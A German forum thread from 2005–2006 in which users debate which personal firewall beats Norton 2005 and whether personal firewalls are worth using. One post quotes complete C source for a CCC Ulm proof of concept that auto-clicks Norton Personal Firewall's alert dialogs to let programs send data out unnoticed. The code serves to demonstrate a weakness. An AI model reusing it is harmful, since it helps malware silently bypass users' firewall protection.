PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Welche Firewall besser als Norton 2005 ?


VoodooMaster
2005-07-02, 18:02:26
Hallo,

nutze die Norton Firewall nun schon seid der Version 2003, jetzt mittlerweile die 2005 und halte das Prgramm für zu lahm und zu groß und Speicherlastig.

Gibts da was kleineres was genau so sicher ist ?

GUNDAM
2005-07-02, 18:22:23
So ziemlich jede Firewall ist besser als dieser Norton Mist. Am besten ist dabei Sygate Personal Firewall. Die ist schön Resourcenschonend und auch leicht zu bedienen. Und obendrein auch noch Kostenlos. Es gibt davon aber auch eine kostenpflichtige Pro Version, welche noch ein paar weitere Features bietet.

Gast
2005-07-02, 18:26:31
Kerio 2.1.5
http://download.kerio.com/dwn/kpf/kerio-pf-2.1.5-en-win.exe
Kostenlos, klein und ohne irgendwelche bunten Knöpfe.

VoodooMaster
2005-07-02, 18:38:31
So ziemlich jede Firewall ist besser als dieser Norton Mist. Am besten ist dabei Sygate Personal Firewall. Die ist schön Resourcenschonend und auch leicht zu bedienen. Und obendrein auch noch Kostenlos. Es gibt davon aber auch eine kostenpflichtige Pro Version, welche noch ein paar weitere Features bietet.

Danke für den Tipp, checke ich mal ab !

yardi
2005-07-02, 19:28:04
Ich benutze auch schon länger Sygate Personal Firewall, ist echt nur zu empfehlen.

Bin auch der Meinung das Norton nur Mist entwickelt. Die AV-engine von denen is auch nicht zu gebrauchen.

Kerio is aber auch nicht sooooo gut meiner Meinung nach. Da kommen mir viel zu viele Abfragefenster die überhaupt nix mit dem Internet zutun haben. Z.B. wenn du die Setup-Routine eines Spiels oder Programms startest fragt er dich 4 oder 5 mal ob du das auch wirklich willst :confused:

Hab das aber bei nem Freund beobachtet der (glaube ich) die Pro-Variante hat, kann sein das es da ne kostenlose Light Variante gibt wo das nicht so nervig ist.

Alex31
2005-07-02, 19:30:42
Mit ein Paar Games kann es zu Problemen mit der Sygate Firewall kommen. Hab Probleme mit BF2 und 1942 wenn die FW an ist. Ich weis nicht wie das bei Kerio ist.

Sele
2005-07-02, 19:50:31
@ yardi

Eine Firewall und eine AV-Engine? Das passt irgendwie nicht ganz zusammen!

Die Norton Firewall hat beim Test einer renommierten PC-Zeitschrift immerhin Platz 2 hinter der Sygate Pro belegt.

Aber wirklich empfehlenswert ist nicht eine einzige Personal Firewall, weil sie allesamt mehr schaden, als nützen! Das System macht man ohne Personal Firewall wesentlich sicherer. Siehe auch dieses Video (http://ulm.ccc.de/chaos-seminar/windows-security/recording.html).

yardi
2005-07-02, 20:10:37
I

Bin auch der Meinung das Norton nur Mist entwickelt. Die AV-engine von denen is auch nicht zu gebrauchen.


Also ich weis nicht was daran missverständlich ist. :biggrin:

Wollte damit nur ausdrücken das Norton nix kann. Weder bei Firewalls noch im AV Bereich. Gibt viele die sich auf Norton verlassen nur weil die halt die "Marktführer" sind.

@Alex

Also ich hatte mit der Sygate Firewall noch nie Probleme mit Games. Hatte eigentlich noch nie irgendwelche Probleme mit der.
Evtl. hast du ausversehen was mit NEIN beantwortet !?!

KinGGoliAth
2005-07-02, 20:13:54
die kerio hatte ich auch mal auf dem rechner.

muss aber ganz ehrlich sagen, dass mir das zu nervig war. jeder fliegenschiss wurde geblockt und ich mußte absolut jede kleinigkeit einzeln freigeben oder sprren ganz egal was es war. ausserdem hat es auch nicht richtig funzen wollen. einige dinge wurden einfach geblockt obwohl ich sie freigegeben hatte und umgekehrt.
ist aber auch schon ne weile her die sache, weiß nicht wie es in der aktuellen version ist.

mit norton internet security bin ich ganz gut unterwegs bisher. hier und da ein klick und schon ist alles geritzt.

RMC
2005-07-02, 22:30:32
Also ich weis nicht was daran missverständlich ist. :biggrin:

Wollte damit nur ausdrücken das Norton nix kann. Weder bei Firewalls noch im AV Bereich. Gibt viele die sich auf Norton verlassen nur weil die halt die "Marktführer" sind.



Und ich weiß nicht was daran objektiv sein soll. Auf was beziehst du denn deine Aussage konkret?

Naja ich verwend Norton und ich hatte Original noch nie einen Virus geschweige denn einen Trojaner oder ein ähnliches Viech. Schon komisch, die produzieren ja angeblich nur Mist? Wie is denn das nur möglich ... :|

Gast
2005-07-02, 23:07:22
Kerio is aber auch nicht sooooo gut meiner Meinung nach. Da kommen mir viel zu viele Abfragefenster die überhaupt nix mit dem Internet zutun haben. Z.B. wenn du die Setup-Routine eines Spiels oder Programms startest fragt er dich 4 oder 5 mal ob du das auch wirklich willst
Das ist evtl bei Version 4 so. Die ursprüngliche Version 2 war schlicht eine Desktopfirewall und nichts weiter. Schlanker wirds nicht.
die kerio hatte ich auch mal auf dem rechner.

muss aber ganz ehrlich sagen, dass mir das zu nervig war. jeder fliegenschiss wurde geblockt und ich mußte absolut jede kleinigkeit einzeln freigeben oder sprren ganz egal was es war.
Das ist der Sinn und Zweck einer Desktopfirewall.
Sollen alternativ nur ein paar Verbindungen unterbunden werden, so vielleicht jede dritte?

ausserdem hat es auch nicht richtig funzen wollen. einige dinge wurden einfach geblockt obwohl ich sie freigegeben hatte und umgekehrt.
ist aber auch schon ne weile her die sache, weiß nicht wie es in der aktuellen version ist.
Das kann ich ausschließen, würde mir nämlich auffallen.

mit norton internet security bin ich ganz gut unterwegs bisher. hier und da ein klick und schon ist alles geritzt.
Das ist genau das Problem dieses Produktes und berechtigter Kritikpunkt daran. Eine Desktopfirewall die automatisch Regelsätze erstellt, kann ebenso automatisch ausgehebelt werden.

KinGGoliAth
2005-07-02, 23:25:09
Das ist evtl bei Version 4 so. Die ursprüngliche Version 2 war schlicht eine Desktopfirewall und nichts weiter. Schlanker wirds nicht.

Das ist der Sinn und Zweck einer Desktopfirewall.
Sollen alternativ nur ein paar Verbindungen unterbunden werden, so vielleicht jede dritte?


Das kann ich ausschließen, würde mir nämlich auffallen.


Das ist genau das Problem dieses Produktes und berechtigter Kritikpunkt daran. Eine Desktopfirewall die automatisch Regelsätze erstellt, kann ebenso automatisch ausgehebelt werden.

nene ich stell bei NIS ja auch alles von hand ein was ins netz darf und was nicht. diese selbsternannte automatische programmsteuerung habe ich gleich als erstes ausgemacht.

bei der kerio version die ich hatte war es auch so, dass immer genehmigt werden mußte wenn irgendein programm irgendwas ändert oder irgendein programm irgendeine andere instanz startet. ob man diese pingelige genauigkeit auch hätte ausschalten können...wer weiß. habe auf jedenfall keinen schalter dazu gefunden ;) .

und bei jedem programm welcher art auch immer 5 mal rausgeworfen zu werden weil kerio nachfragt ob wirklich dieses oder jenes gestartet oder ausgeführt werden darf (oder garkeine nachrichti bekommt und das programm ohne jeden erkennbaren grund abkackt) dann krieg ich ganz schnell son hals. schließlich will ich mit meinem rechner auch was (mehr oder weniger) sinnvolles anstellen und nicht 20 von 60 sekunden damit verbringen der blöden firewall völlig überflüssig zu erzählen was darf und was nicht darf.
meine version hat sich das auch irgendwie nicht gemerkt welches programm nun was starten darf. da konnte ich jedes mal wieder auf erlauben klicken. da hatte ich ziemlich schnell die faxen dicke wie man sich sicherlich denken kann.

Bandit666
2005-07-02, 23:54:47
nene ich stell bei NIS ja auch alles von hand ein was ins netz darf und was nicht. diese selbsternannte automatische programmsteuerung habe ich gleich als erstes ausgemacht.

bei der kerio version die ich hatte war es auch so, dass immer genehmigt werden mußte wenn irgendein programm irgendwas ändert oder irgendein programm irgendeine andere instanz startet. ob man diese pingelige genauigkeit auch hätte ausschalten können...wer weiß. habe auf jedenfall keinen schalter dazu gefunden ;) .

und bei jedem programm welcher art auch immer 5 mal rausgeworfen zu werden weil kerio nachfragt ob wirklich dieses oder jenes gestartet oder ausgeführt werden darf (oder garkeine nachrichti bekommt und das programm ohne jeden erkennbaren grund abkackt) dann krieg ich ganz schnell son hals. schließlich will ich mit meinem rechner auch was (mehr oder weniger) sinnvolles anstellen und nicht 20 von 60 sekunden damit verbringen der blöden firewall völlig überflüssig zu erzählen was darf und was nicht darf.
meine version hat sich das auch irgendwie nicht gemerkt welches programm nun was starten darf. da konnte ich jedes mal wieder auf erlauben klicken. da hatte ich ziemlich schnell die faxen dicke wie man sich sicherlich denken kann.


Das ist schlecht. Denn Kerio hat einen Systemfirewall und einen Internetfirewall! Kerio ist schon die Oberklasse der Win-PFW's!

Schaltet man die Systemfirewall aus.......fragt Kerio nur noch nach wenns ums Internet geht. Was ist daran schlimm?

Und das du den Schalter nicht gefunden ist traurig....der Springt einen ja fast an!

mfg

KinGGoliAth
2005-07-02, 23:58:45
ich kann mich nur wiederholen :
die version die ich vor ... sagen wir mal 2 1/2 jahren hatte war einfach scheiße. schlecht zu bedienen, umständlich, unzumutbar. in ruhe irgendwas machen war unmöglich weil immer irgendwas los war.
heute mag es sich vielleicht gebessert haben aber damals war es schrott.

Bandit666
2005-07-03, 00:06:33
Dann teste mal 4.12.......ist einfach traumhaft!! :biggrin:

mfg

KinGGoliAth
2005-07-03, 00:09:55
näää mit NIS ist das immer so eine sache.

wenn du das erstmal drauf hast bekommst du das nicht wieder runter ohne dir dabei dein windows zu zerballern :rolleyes: ;)

das nennt man kundenbindung :lol:

Bandit666
2005-07-03, 00:11:08
Dafür gibbet schon nette Tools....sogar eins von G-Data glaub ich!

mfg

KinGGoliAth
2005-07-03, 00:11:40
hm. naja probieren kann ich es ja mal wenn ich grund zur unzufriedenheit habe.

yardi
2005-07-03, 01:23:04
Und ich weiß nicht was daran objektiv sein soll. Auf was beziehst du denn deine Aussage konkret?

Naja ich verwend Norton und ich hatte Original noch nie einen Virus geschweige denn einen Trojaner oder ein ähnliches Viech. Schon komisch, die produzieren ja angeblich nur Mist? Wie is denn das nur möglich ... :|


Ich beziehe mich auf etliche Tests in verschiedenen Magazinen und auf Homepages die fast alle bescheinigen das andere Programme wie Kaspersky, Bitdefender usw. eine wesentliche höhere Erkennungsrate beim aufspüren von Viren haben. Ausserdem ist es bei Norton so das sehr sporadisch Updates veröffentlicht werden, meine Version von Bitdefender sucht alle 3 Stunden nach Updates.

Hatte selbst mal Norton AV + Firewall installiert und es hat mir halt garnet gefallen ist aber natürlich auch Geschmackssache...

yardi
2005-07-03, 01:30:38
näää mit NIS ist das immer so eine sache.

wenn du das erstmal drauf hast bekommst du das nicht wieder runter ohne dir dabei dein windows zu zerballern :rolleyes: ;)

das nennt man kundenbindung :lol:

Das is auch so ne Sache !!! Wenn man sich schon extra Tools runterladen muss um Norton Software restlos zu deinstallieren heisst das für mich: FINGER WEG !!!!

Klar hinterlässt jede Anwendung bissel Müll in der Registry usw. aber bei Norton-Software is das extrem schlimm. Hatte damals auch etliche Probleme bis ich einen andren Virenscanner installieren konnt und alles wieder normal lief.

Gast
2005-07-03, 06:32:55
Ich empfehle jedem von euch, sich dieses Dokument reinzuziehen und dann jegliche Diskussion über PFWs DIREKT einzustellen! :)

http://ulm.ccc.de/chaos-seminar/personal-firewalls/recording.html

Bandit666
2005-07-03, 09:14:39
Ich empfehle jedem von euch, sich dieses Dokument reinzuziehen und dann jegliche Diskussion über PFWs DIREKT einzustellen! :)

http://ulm.ccc.de/chaos-seminar/personal-firewalls/recording.html


Um Sinn und Unsinn von PFW's gehts hier nicht!! Checkt das denn keiner?


mfg

Gast
2005-07-03, 10:05:22
Wie verblendet muss man sein, um solche Tatsachen einfach zu ignorieren. Um was geht es hier denn? Um Sicherheit, oder ein gutes Gefühl? Der Kauf einer PFW ist genau so sinnvoll, wie der Kauf von Tabletten die den Dödel wachsen lassen.

Winter[Raven]
2005-07-03, 10:07:55
Bitdefender 8? Packet mit Firewall, Anti-Vir, Spamfilter!

Superguppy
2005-07-03, 10:58:41
Die Meinungen bei Firewalls gehen anscheinend stark auseinander, aber das ist nun mal vom persönlichen Geschmack abhängig. Ich persönlich bin nach einigem herumprobieren bei der Kerio Personal Firewall gelandet. Sie ist einfach zu bedienen und bietet einen für mich ausreichenden Schutz. Allerdings habe auch ich die als nervend beschriebene Systemfirewall abgeschaltet, da diese jedes mal schreit, wenn ein Programm ein anderes starten will.
Vor der Kerio Personal Firewall hatte ich Zone Alarm und für kurze Zeit die Sysgate Personal Firewall.
Zone Alarm gefiel mir gut und machte einen sicheren Eindruck. Was mich allerdings daran gestört hat, ist die erkennung der Netzwerke. Jedes Mal, wenn ich von meinem DHCP eine neue IP bekommen habe, die ich noch nie hatte, fragte der Zone Alarm jedes Mal ernaut, ob das jetzt ein vertrautes Netzwerk ist oder nicht. Die KPF hat diese Problem nicht, die erkennt, dass alle IPs aus dem selben Netzwerk stammen und fragt nicht immer nach.
Die Sygate Personal Firewall hatte ich versuchsweise nur einige wenige Stunden im Einsatz. Auch diese macht einen soliden Eindruck, alledings ist sie eher für Profis bzw. Leute, die gerne Unmengen an Einstelungen haben. Die KPF bietet meines Wissens beinahe den selben Funktionsumfang, allerdings sind hier die Optionen, die der normale Heimbenutzer eher nicht brauchen wird, eher versteckt. Damit wirkt die Benutzeroberfläche übersichtlicher.
So - und nun dürft ihr mich auseinander nehmen und kritisieren :-P . Viel Spaß!

MfG,
Superguppy

Bandit666
2005-07-03, 11:03:34
Wie verblendet muss man sein, um solche Tatsachen einfach zu ignorieren. Um was geht es hier denn? Um Sicherheit, oder ein gutes Gefühl? Der Kauf einer PFW ist genau so sinnvoll, wie der Kauf von Tabletten die den Dödel wachsen lassen.


Ganz einfach!!

1. Der Threadstarter will wissen, welche Firewall besser als Norton 2005 ist!! Nichts anderes.
2. Jeder Thread wo jemand eine Kleinigkeit zur FW wissen will ufert IMMER aufgrund arroganter User/Gäste in einen "PFW-sind-Mist-Thread" aus. Ja, PFW sind nicht so sicher wie man denkt......aber für Newbies und Anfänger ideal.
Schonmal daran gedacht das es auch User gibt die mit ner PFW zufreiden und glücklich sind?
3. Ich bin nicht verblendet.....du weisst ja nichtmal was ich für ein Sicherheitskonzept fahre......also benimm dich!


mfg

PatkIllA
2005-07-03, 11:10:19
Ja, PFW sind nicht so sicher wie man denkt......aber für Newbies und Anfänger ideal.Grade wenn der Benutzer nicht mal ansatzweise weiss, was da passiert ist das vermittelte falsche Gefühl der Sicherheit nochmal doppelt schlimm. Die nicken dann alles ab und wenn man als Admin untewegs ist ist es sowieso schwachsinnig. Da blockt man vielleicht den Updatecheck von ein paar Programmen, aber nicht irgendwas Bedenkliches.
Schonmal daran gedacht das es auch User gibt die mit ner PFW zufreiden und glücklich sind? Die sind zufrieden, weil mal ein böser Portscan gemeldet wird und nichts passiert ist. Das wäre es ohne PFW aber auch nicht.


Dass man sich für so eine Aussage extra ausloggt, ist aber schon arm.

Bandit666
2005-07-03, 11:19:33
Grade wenn der Benutzer nicht mal ansatzweise weiss, was da passiert ist das vermittelte falsche Gefühl der Sicherheit nochmal doppelt schlimm. Die nicken dann alles ab und wenn man als Admin untewegs ist ist es sowieso schwachsinnig. Da blockt man vielleicht den Updatecheck von ein paar Programmen, aber nicht irgendwas Bedenkliches.
Die sind zufrieden, weil mal ein böser Portscan gemeldet wird und nichts passiert ist. Das wäre es ohne PFW aber auch nicht.


Dass man sich für so eine Aussage extra ausloggt, ist aber schon arm.

Das ist ja alles richtig was du sagst...........aber das steht hier einfach nicht zu Debatte. Wurde schon 1000mal durchgekaut!!!!!!!!!!!!!!!!!!!!!!!!

mfg

PS: Was meinst du mit ausloggen? Ich hab mich net ausgeloggt. :confused:

PatkIllA
2005-07-03, 11:20:57
Das ausloggen war auf die Gastproblematik bezogen. Ich bin mir ziemlich sicher, dass ein Großteil der provokanten Gastpostings von registrierten Benutzern abgesetzt wird.

Gast
2005-07-03, 11:32:46
du weisst ja nichtmal was ich für ein Sicherheitskonzept fahre

Dann erzähle uns doch bitte von deinem Sicherheitskonzept. Vielleicht können wir ja noch etwas von dir lernen.

Bandit666
2005-07-03, 11:40:22
Dann erzähle uns doch bitte von deinem Sicherheitskonzept. Vielleicht können wir ja noch etwas von dir lernen.

Warum sollte ich? Das ist nicht Gegenstand des Threads!

mfg

Gast
2005-07-03, 11:54:08
Du hast es zum Gegenstand dieses Threads gemacht. Wahrscheinlich hast du gar kein Konzept - außer deiner tollen PFW und einem Virenscanner.

Bandit666
2005-07-03, 11:58:33
*gähn*

Bist zum Glück nur ein Gast.....also indiskutabel!

Gast
2005-07-03, 12:00:54
Lieber ein Gast, als ein Schwätzer.

KillerCookie
2005-07-03, 12:49:44
Lieber ein Gast, als ein Schwätzer.

Lieber in der ewigen Sicherheit der Anonymität verstecken?

Topic:
Ich habe ewig Zonealarm Personal benutzt (kostenlos) und hatte eigentlich wenige Probleme, nur das automatische erstellen von Einträgen in die Berechtigungen habe ich gleich rausgeworfen.

Zur Zeit bin ich aber ohne Desktop Firewall unterwegs, da ich duch Vodafone neuerdings einen quasi Hardware-Firewall vor mir habe... defakto auch eine interne IP und laut Internet-Tests sind _alle_ getesteten Ports dicht

MfG Maik

Thowe
2005-07-03, 13:12:21
Bei den netten Surfverhalten vieler, den zahlreichen "Tools" die Windows "freiwillig" lädt - über Sicherheitslöcher, mag eine PF durchaus sinnig sein. Nützt einen zwar auch nichts, wenn die Programme dann über den Port 80 gehen, aber wenn ein Programm wie DIALER.EXE eine Einwahl ins Internet vornehmen will, kann sich eine PF durchaus bezahlt machen.

Man wird immer Gründe für und gegen diese finden, alles eine Frage des eingene technischen Vermögens und das gesalzen mit den damit verbundene Ansichten und Meinungen. Unsinn darüber diskutieren zu wollen, wenn die grundsätzliche Basis eine andere ist.

Prinzipiell finde ich auch die NV Firewall nicht schlecht, die sehen normale Anwender wenigstens eher selten.

KillerCookie
2005-07-03, 22:09:37
Bei den netten Surfverhalten vieler, den zahlreichen "Tools" die Windows "freiwillig" lädt - über Sicherheitslöcher, mag eine PF durchaus sinnig sein. Nützt einen zwar auch nichts, wenn die Programme dann über den Port 80 gehen, aber wenn ein Programm wie DIALER.EXE eine Einwahl ins Internet vornehmen will, kann sich eine PF durchaus bezahlt machen.

Man wird immer Gründe für und gegen diese finden, alles eine Frage des eingene technischen Vermögens und das gesalzen mit den damit verbundene Ansichten und Meinungen. Unsinn darüber diskutieren zu wollen, wenn die grundsätzliche Basis eine andere ist.

Prinzipiell finde ich auch die NV Firewall nicht schlecht, die sehen normale Anwender wenigstens eher selten.

Ja, richtig. für den normalen Anwender reicht das völlig aus... vor solch primitiven Dialern schützt einen sowas alle Male und das sollte ja auch der Sinn davon sein. Für alles weitere gibt es Hardware-Firewalls und nur die sind halbwegs (nicht 100%ig) sicher...

MfG Maik

Dunkeltier
2005-07-03, 22:11:21
Ganz einfach!!

1. Der Threadstarter will wissen, welche Firewall besser als Norton 2005 ist!! Nichts anderes.
2. Jeder Thread wo jemand eine Kleinigkeit zur FW wissen will ufert IMMER aufgrund arroganter User/Gäste in einen "PFW-sind-Mist-Thread" aus. Ja, PFW sind nicht so sicher wie man denkt......aber für Newbies und Anfänger ideal.

(...)


Fatale Fehleinschätzung. Woher soll mein Opa wissen, ob die svhost.exe ins Internet darf oder nicht?

Bandit666
2005-07-04, 14:55:44
Das hat aber mit dem Thread hier nichts zu tun.
Man sollte nicht alle User als extrem dumm abstempeln.

Sicher, ein Router, Dienste abschalten und Co. sind effektiver....aber teilweise zu schwer für einen Laien. Obwohl ich mir da beim Router nicht sicher bin. :biggrin:

Warum will man hier immer die Leute bekehren? Die müssen ihre Erfahrungen selbst machen. Wenn jemand nur ne PFW haben will....trotz Erkenntnis über das Risiko, das ist das eben so.
Manche tun so als ob ein Kinderschänder höher angesehn ist wie PFW-Nutzer!!


mfg

Mr. Lolman
2005-07-04, 15:30:26
Lol, hätt mir nicht gedacht, dass der Quellcode, um Norton-IS auszutricksen, so kurz ist:


// Source Code "OK-Button-Klicker für Norton Personal Firewall" V.1.1
// Jonathan Häberle <jonathan.haeberle@ulm.ccc.de>

// Programm zum Chaos-Seminar Ulm "Personal Firewall"
// Hierbei handelt es sich um ein Proof of Concept, dafür
// dass jedes Programm trotz Personal Firewall Daten ins Internet senden kann

// Bug: Der Alarm-Dialog "blitzt" noch kurz auf,
// die ließe sich noch mit einem Hook der die
// WM_SHOW Window-Message abfängt beheben


#include <windows.h>

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
MessageBoxEx(NULL,(LPCTSTR)"Der OK-Button-klicker für die Norton Personal Firewall läuft jetzt im Hintergrund",(LPCTSTR)"^_^", NULL, NULL);


while (true) {

// schaue ob ein Fenster von der Firewall auf ist
HWND w;
while ((w = FindWindowEx(NULL,NULL,NULL,(LPCTSTR)"Norton Personal Firewall")) == NULL) {
Sleep(100);
}


// schauen ob es auch wirklich ein "Achtung! Böser Hacker"-Dialog ist
HWND ap = FindWindowEx(w,NULL,NULL,(LPCTSTR)"ccAlertPrompt");
if (ap == NULL) { // falsches fenster erwischt
Sleep(100);
continue;
}


// suche die ComboBox
HWND cb = FindWindowEx(w, NULL, (LPCTSTR)"ComboBox", NULL);
if (cb == NULL) {
MessageBoxEx(NULL,(LPCTSTR)"Leider konnte ich meine ComboBox nicht finden!",(LPCTSTR)"Geht ned :-/", NULL, NULL);
return 1;
}

// auf comboBox klicken
SendMessage(cb,WM_LBUTTONDOWN,NULL,NULL);
SendMessage(cb,WM_LBUTTONUP,NULL,NULL);


// nach oben :-)
SendMessage(cb,WM_KEYUP, (WPARAM)0x26, (LPARAM)0xC14800001); // drücken
SendMessage(cb,WM_KEYDOWN, (WPARAM)0x26, (LPARAM)0x01840001 ); // los lassen
SendMessage(cb,WM_KEYUP, (WPARAM)0x26, (LPARAM)0xC14800001); // nach oben :-)
SendMessage(cb,WM_KEYDOWN, (WPARAM)0x26, (LPARAM)0x01840001 ); // los lassen


// noch mal klicken
SendMessage(cb,WM_LBUTTONDOWN,NULL,NULL);
SendMessage(cb,WM_LBUTTONUP,NULL,NULL);


// OK-Button suchen
HWND bt = FindWindowEx(w, NULL, (LPCTSTR)"Button", NULL);
if (bt == NULL) {
MessageBoxEx(NULL,(LPCTSTR)"OK Button nicht gefunden",(LPCTSTR)"Geht ned :-/", NULL, NULL);
return 1;
}

// ... und auf OK-Klicken
SendMessage(bt,WM_LBUTTONDOWN,NULL,NULL);
SendMessage(bt,WM_LBUTTONUP,NULL,NULL);

Sleep(100); // fertig
}

return 0;
}


http://copton.net/vortraege/pfw/norton-autoklick.c

Bandit666
2006-06-13, 18:22:46
Tja.,.....hoffentlich merken die vielen DAUs das Norton-Produkte nix können, und steigen mal auf was richtiges um.

mfg

UliBär
2006-06-14, 01:49:17
Welche Firewall besser als Norton 2005 ?Alles, außer Zonealarm! X-D

Gast
2006-06-14, 03:10:56
Bandit666[/POST]']Tja.,.....hoffentlich merken die vielen DAUs das Norton-Produkte nix können, und steigen mal auf was richtiges um.

mfgAndere PFWs sind aber auch nur geringfügig besser als der Norton-Crap. Das ganze Zeugs braucht sowieso kein Mensch. Das ist höchstens was für DAU, die ein Gefühl von Sicherheit haben wollen.

sChRaNzA
2006-06-14, 09:35:43
Ich häng hier mal ne Frage dran...

Ist eigentlich jeder Router eine Firewall?

Gast
2006-06-14, 10:21:26
sChRaNzA[/POST]']Ich häng hier mal ne Frage dran...

Ist eigentlich jeder Router eine Firewall?eine firewall ist ein konzept aber jeder router ist ein portfilter....

paketfilter sind dann die sachen die in einem consumer gerät als firewall bezeichnet wird...



andere frage...sind erweiterte partitionen nichtmehr möglich bei basisdatenträgern (mit vista?)

sChRaNzA
2006-06-14, 10:38:21
Ahja... keine Ahnung was du meinst. ;)

Was auch immer als was bezeichnet wird aber kann jeder Router ,, umgangssprachlich '' für Deppen als Firewall bezeichnet werden?

Gast
2006-06-14, 10:50:00
Port 80 macht man eh dicht.

Gast
2006-06-14, 11:00:59
sChRaNzA[/POST]']Ahja... keine Ahnung was du meinst. ;)

Was auch immer als was bezeichnet wird aber kann jeder Router ,, umgangssprachlich '' für Deppen als Firewall bezeichnet werden?ja kann man


@gast über mir
und was willst du jetzt mit diesem kommentar aussagen? bei den meisten clients ist der "port 80" garnicht erreichbar weil dort kein dienst läuft.

Gast
2006-06-14, 11:07:15
na dann ist ja gut... :D